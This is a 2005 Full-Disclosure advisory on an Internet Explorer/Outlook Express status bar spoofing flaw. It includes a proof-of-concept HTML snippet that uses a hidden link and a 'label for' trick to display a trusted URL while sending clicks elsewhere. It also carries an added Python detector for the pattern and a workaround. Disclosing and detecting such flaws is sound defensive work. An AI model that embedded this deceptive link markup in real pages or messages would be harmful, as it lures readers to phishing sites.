[Full-Disclosure] IE/OE Restricted Zone Status Bar Spoofing

winter bitlance bitlance_3 at hotmail.com
Thu Feb 17 05:22:08 GMT 2005


Hi LIST.

It is normally possible for script code to manipulate the information displayed 
in the status bar in the Internet Zone. By default, Outlook Express 6 opens 
HTML e-mail messages in the Restricted sites zone instead of the Internet 
Zone. Outlook Express users may therefore place particular trust in information 
displayed in the status bar, since HTML documents are viewed in the context of 
the "Restricted" zone, which has scripting support disabled.

However, errors in Internet Explorer allow the status bar to be manipulated 
without using any script code. This can be exploited by embedding a 
specially crafted form in a link.

http-equiv has discovered a weakness in Internet Explorer which can 
potentially be exploited by malicious people to trick users into 
visiting a malicious website that facilitates a "phishing" attack 
(CAN-2004-1104).

Now another weakness, which uses a "label for id" trick, has been discovered. 
This weakness is a variant of CAN-2004-1104.

Example (the archive replaced the opening angle brackets with "[" characters; 
they are restored here):
- -----8<----- -----8<----- -----8<----- -----8<-----

<!-- saved from url=(0007)http:// -->
<body style="color: WindowText; background-color: Window;">
<div>IE/OE Restricted Zone Status Bar Spoofing</div>
<div>Tested on Windows XP with SP2 installed.</div>
<p><a id="SPOOF" href="http://www.example.com/?maliciouscontents"></a></p>
<div>
  <a href="http://www.microsoft.com/windows/default.mspx">
    <table>
      <caption>
        <a href="http://www.microsoft.com/windows/default.mspx ">
          <label for="SPOOF">
            <u style="cursor: pointer; color: blue">
              http://www.microsoft.com/windows/default.mspx
            </u>
          </label>
        </a>
      </caption>
    </table>
  </a>
</div>

- -----8<----- -----8<----- -----8<----- -----8<-----
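The pattern above is a label whose "for" attribute points at a hidden link with a different href, nested inside a visible link. A mail gateway or HTML sanitizer can flag that pattern directly. The following is an added example written for this page, not code from the advisory or its author; the class and function names are mine, and the sample input is a constructed, simplified copy of the advisory's markup.

```python
from html.parser import HTMLParser

class LabelSpoofDetector(HTMLParser):
    """Collects <a id=...> targets and <label for=...> elements nested in links."""

    def __init__(self):
        super().__init__()
        self.anchor_stack = []   # hrefs of the currently open <a> elements
        self.anchors_by_id = {}  # id -> href for every <a id=...>
        self.labels = []         # (visible_href, for_id) for labels inside links

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            href = (a.get("href") or "").strip()   # trailing spaces are not significant
            self.anchor_stack.append(href)
            if a.get("id"):
                self.anchors_by_id[a["id"]] = href
        elif tag == "label" and a.get("for") and self.anchor_stack:
            # Label inside a link: the status bar shows the enclosing link,
            # but a click activates whatever element the "for" id names.
            self.labels.append((self.anchor_stack[-1], a["for"]))

    def handle_endtag(self, tag):
        if tag == "a" and self.anchor_stack:
            self.anchor_stack.pop()

def find_status_bar_spoofs(html):
    """Return (displayed_href, real_href) pairs where a label-in-link points elsewhere."""
    p = LabelSpoofDetector()
    p.feed(html)
    p.close()
    findings = []
    for visible, target_id in p.labels:
        real = p.anchors_by_id.get(target_id)
        if real is not None and real != visible:
            findings.append((visible, real))
    return findings

# Constructed sample: the advisory's spoofing pattern, reduced to its essential parts.
SAMPLE = """
<p><a id="SPOOF" href="http://www.example.com/?maliciouscontents"></a></p>
<a href="http://www.microsoft.com/windows/default.mspx">
  <label for="SPOOF"><u>http://www.microsoft.com/windows/default.mspx</u></label>
</a>
"""

if __name__ == "__main__":
    for shown, real in find_status_bar_spoofs(SAMPLE):
        print(f"status bar shows {shown} but a click goes to {real}")
```

A label whose target carries the same href as the enclosing link is not reported, so ordinary form markup does not trigger the check.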

Workaround (on Windows XP Service Pack 2):

You can change the zone elevation setting for each security zone by 
configuring the following option from Allow to Disabled or Prompt in the 
Custom Level security dialog:
"Web sites in less privileged Web content zones can navigate into this 
zone"

http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx



Solution:
Never follow links from untrusted sources.

Read e-mail messages in plain text format if you are using Outlook Express 
6 SP1 or a later version, to help protect yourself from the HTML e-mail 
attack vector.

REGARDS.

-- 

bitlance winter





Full-Disclosure is hosted and sponsored by Secunia.